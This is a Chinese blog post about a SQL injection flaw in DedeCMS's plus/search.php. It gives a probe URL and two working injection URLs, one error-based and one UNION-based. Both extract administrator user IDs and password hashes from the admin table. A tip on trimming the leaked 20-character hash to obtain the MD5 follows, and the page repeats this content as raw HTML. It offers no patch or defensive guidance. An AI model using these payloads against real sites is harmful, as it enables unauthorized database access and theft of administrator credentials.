dedecms plus/search.php漏洞

博主： donny
发布时间：2013 年 05 月 13 日
1783 次浏览
暂无评论
839字数
分类：听过很多道理，却依然过不好这一生

提交：

HTTP://HUISEKEREN.ORG/plus/search.php?keyword=as&typeArr[ uNion ]=a

返回结果 Safe Alert: Request Error step 1 !如果后面的数字是1的话就用这段代码

HTTP://HUISEKEREN.ORG/plus/search.php?keyword=as<!−−DVFMTSC−−>&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+<!−−DVFMTSC−−> (select+count(*),concat(floor<!−−DVFMTSC−−> (rand(0)*2),<!−−DVFMTSC−−> (substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a<!−−DVFMTSC−−> +from+information_schema.tables+group+by+a)b)%23@`'`+]=a

如果是2的话就用

HTTP://HUISEKEREN.ORG/plus/search.php?keyword=as&typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`'`+]=a

如果爆出 20位MD5密文去掉前三后一。

最后修改：2018 年 01 月 02 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

此内容被密码保护
评论数： 0
此内容被密码保护
评论数： 0
401.3
评论数： 3
Wordpress实现做动态副标题
评论数： 2
小羽
评论数： 1

ATTENTION
TERMINATION OF DOMAIN huisekere...
fei
看着挺有收货，哎，一人久了，真的好想谈恋爱。
健康网
学海无涯，博客有道！拜读咯！
套图网
不止一次的来，不止一次的去，来来去去，这就是这个博客的魅力！
沃八达
没事就来转一转，每天多吃两碗饭！

dedecms plus/search.php漏洞

donny • 2013 年 05 月 13 日

<p><img alt="" src="http://img.dnmr.net/_old_HUISEKEREN_dedeexp.jpg" width="1039" height="493" /></p><p><span style="font-family: 'arial black', 'avant garde'; font-size: medium;">提交：</span></p><div class="dp-highlighter"><div class="bar"></div><ol class="dp-j" start="1">
	<li class="alt"><span><span>HTTP:</span><span class="comment">//HUISEKEREN.ORG/plus/search.php?keyword=as&amp;typeArr[ uNion ]=a</span><span>  </span></span></li>
</ol></div><pre></pre><p><code lang="php[lines-notools]"> </code></p><pre></pre><p><span style="font-family: 'arial black', 'avant garde'; font-size: medium;">返回结果 <span style="color: #ff0000;">Safe Alert: Request Error step 1 !</span>如果后面的数字是1的话就用这段代码</span></p><div class="dp-highlighter"><p><div class="bar"></div><ol class="dp-cpp" start="1">
<ol class="dp-cpp" start="1">
<ol class="dp-cpp" start="1">
	<li class="alt"><span><span>HTTP:</span><span class="comment">//HUISEKEREN.ORG/plus/search.php?keyword=as&lt;!−−DVFMTSC−−&gt;&amp;typeArr[111%3D@`'`)+and+(SELECT+1+FROM+&lt;!−−DVFMTSC−−&gt; (select+count(*),concat(floor&lt;!−−DVFMTSC−−&gt; (rand(0)*2),&lt;!−−DVFMTSC−−&gt; (substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a&lt;!−−DVFMTSC−−&gt; +from+information_schema.tables+group+by+a)b)%23@`'`+]=a</span><span>  </span></span></li>
</ol>
</ol>
</ol><p>&nbsp;</p><p>&nbsp;</p></div><p><span style="font-family: 'arial black', 'avant garde'; font-size: medium;">如果是2的话就用</span></p><div class="dp-highlighter"><div class="bar"></div><ol class="dp-c" start="1">
	<li class="alt"><span><span>HTTP:</span><span class="comment">//HUISEKEREN.ORG/plus/search.php?keyword=as&amp;typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`'`+]=a</span><span>  </span></span></li>
</ol></div><pre></pre><p>&nbsp;</p><pre></pre><p>如果爆出 20位MD5密文 去掉前三后一。</p>

dedecms plus/search.php漏洞

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

此内容被密码保护

此内容被密码保护

401.3

Wordpress实现做动态副标题

小羽

我 - Lookahead2013

php

灰色客人六月推出云主机--腾讯云核心代理

我想表达一些什么－Lookahead2013

不甘心

dedecms plus/search.php漏洞

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

dedecms plus/search.php漏洞

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款